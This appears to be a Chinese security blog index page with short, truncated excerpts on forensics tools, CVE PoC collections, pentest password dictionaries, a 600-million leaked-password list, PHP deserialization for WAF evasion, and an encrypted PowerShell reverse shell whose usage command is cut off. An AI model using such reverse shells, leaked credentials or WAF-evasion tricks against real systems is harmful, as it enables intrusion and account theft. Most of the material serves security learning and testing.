GRR Rapid Response远程实时取证工具 GRR Rapid Response是一种事件响应框架，专注于对Linux、macOS/OS X和Windows客户端远程执行实时取证分析。调查人员将Python代理安装到目标系统上后，可以远程实时分析内...

OSXCollector取证工具 OSXCollector是macOS/OSX的取证证据收集和分析工具包，集合脚本在可能受感染的计算机上运行，​​并输出描述目标计算机的JSON文件。OSXCollector从plist，SQLite数据库和本地文件系统信息...

Awesome CVE PoC CVE PoC的精选列表项目，这是一个关于常见漏洞和暴露概念证明的集合。每个CVE PoC都包含并连接至相关Bypass技术性讨论连接或PoC脚本，可以为您做重现学习及安全检测提供服务。 CVE PoC的...

SaiDict 渗透测试字典 该项目维护者收藏了弱口令，敏感目录，敏感文件等渗透测试常用攻击字典。用于项目的安全审计与安全检测。 渗透测试字典项目 目前字典的目录大概分布如下： 账户字典 |-常用弱...

GitHub曾经是一个面向所有人的开放和免费平台，但现在是时候重新思考它的安全性与开放性了。这不是杞人忧天，也不是温馨提示，而是已经发生的事实，备份你的数据。从美国排他性的贸易战开始起，再到典型的华为事...

ReverseTCPShell 反弹加密shell 一个通过TCP加密（AES 256位）反弹Shell的工具，使用PowerShell。 使用 攻击方 (C2-Server 监听)： PS> .\ReverseTCP.ps1 目标 (客户端)： ECHO IEX([string](...

6亿密码md5 Hash 这是国外一位叫ndronicus的安全研究者分享出来的，从2018年夏天到大约十年中从100个最大的密码泄露数据库存储中收集的6亿个唯一的纯文本密码的列表。 ndronicus从这些密码生成了NTLM，sha...

BurpSuite AuthMatrix插件 AuthMatrix 是一个Burp Suite扩展，用于检测权限授权问题，设置好session就能进行自动化测试。相似功能的插件还有：BurpSuite Authz。Authz会先访问一遍接口抓包，然后“Send reques...

PHP反序列化介绍 在PHP进行反序列化时，会将序列化中的变量传入类中，并且调用__destuct等魔法函数。巧妙应用可达到免杀D盾，过安全狗等WAF软件的效果。 TestCode1: <?php class A{ public $name =...

如何在 Mac 上拍摄屏幕快照？截图录屏 您可以捕捉整个屏幕、某个窗口或屏幕上的选定部分。 如果您已经升级到 macOS Mojave，则可以使用 Shift-Command (⌘)-5 来拍摄所有类型的屏幕快照，或者为您的屏...